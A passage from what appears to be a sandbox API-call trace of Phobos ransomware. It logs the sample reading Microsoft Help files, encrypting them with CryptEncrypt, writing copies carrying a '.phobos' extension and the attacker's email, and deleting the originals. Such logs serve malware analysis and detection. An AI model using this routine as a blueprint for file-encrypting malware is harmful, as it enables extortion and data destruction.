dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.256] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.256] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.256] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.256] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.256] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x158, lpOverlapped=0x0) returned 1 [0178.257] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.257] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.258] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32c28) returned 1 [0178.258] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.258] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.258] CryptDestroyKey (hKey=0xa32c28) returned 1 [0178.258] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.258] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.258] CloseHandle (hObject=0x140) returned 1 [0178.258] CloseHandle (hObject=0x180) returned 1 [0178.258] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.14.1033.hxn")) returned 1 [0178.259] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.259] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=368) returned 1 [0178.259] CloseHandle (hObject=0x180) returned 1 [0178.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn")) returned 0x2022 [0178.259] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.259] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.259] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.259] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.260] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.260] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.260] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.260] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x170, lpOverlapped=0x0) returned 1 [0178.262] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x180, dwBufLen=0x180 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x180) returned 1 [0178.262] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x180, lpOverlapped=0x0) returned 1 [0178.263] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.263] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.263] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.263] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.263] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.263] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.263] CloseHandle (hObject=0x180) returned 1 [0178.263] CloseHandle (hObject=0x140) returned 1 [0178.263] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSACCESS.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msaccess.dev.14.1033.hxn")) returned 1 [0178.264] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.264] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.264] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=326) returned 1 [0178.265] CloseHandle (hObject=0x140) returned 1 [0178.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn")) returned 0x2022 [0178.265] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.265] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.265] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.265] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.265] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.265] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.265] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.265] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x146, lpOverlapped=0x0) returned 1 [0178.266] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0178.266] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x150, lpOverlapped=0x0) returned 1 [0178.267] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.267] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.267] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.267] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.267] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.267] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.267] CloseHandle (hObject=0x140) returned 1 [0178.268] CloseHandle (hObject=0x180) returned 1 [0178.268] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSOUC.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.msouc.14.1033.hxn")) returned 1 [0178.268] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.268] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.269] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=326) returned 1 [0178.269] CloseHandle (hObject=0x180) returned 1 [0178.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn")) returned 0x2022 [0178.269] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.269] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.269] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.269] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.270] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.270] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.270] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x146, lpOverlapped=0x0) returned 1 [0178.270] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0178.270] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x150, lpOverlapped=0x0) returned 1 [0178.271] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.271] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.271] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.271] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.271] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.271] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.271] CloseHandle (hObject=0x180) returned 1 [0178.271] CloseHandle (hObject=0x140) returned 1 [0178.272] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.14.1033.hxn")) returned 1 [0178.272] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.272] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.273] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=350) returned 1 [0178.273] CloseHandle (hObject=0x140) returned 1 [0178.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn")) returned 0x2022 [0178.273] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.273] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.273] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.273] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.273] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.273] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.273] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x15e, lpOverlapped=0x0) returned 1 [0178.274] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.274] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.275] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.275] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.275] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.275] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.275] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.275] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.275] CloseHandle (hObject=0x140) returned 1 [0178.275] CloseHandle (hObject=0x180) returned 1 [0178.275] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSPUB.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mspub.dev.14.1033.hxn")) returned 1 [0178.276] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.276] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.276] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=332) returned 1 [0178.276] CloseHandle (hObject=0x180) returned 1 [0178.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn")) returned 0x2022 [0178.277] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.277] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.277] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.277] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.277] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.277] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.277] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.277] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x14c, lpOverlapped=0x0) returned 1 [0178.278] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150, dwBufLen=0x150 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x150) returned 1 [0178.278] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x150, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x150, lpOverlapped=0x0) returned 1 [0178.279] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.279] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.279] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.279] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.279] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.279] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.279] CloseHandle (hObject=0x180) returned 1 [0178.279] CloseHandle (hObject=0x140) returned 1 [0178.279] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.MSTORE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.mstore.14.1033.hxn")) returned 1 [0178.280] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.280] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), 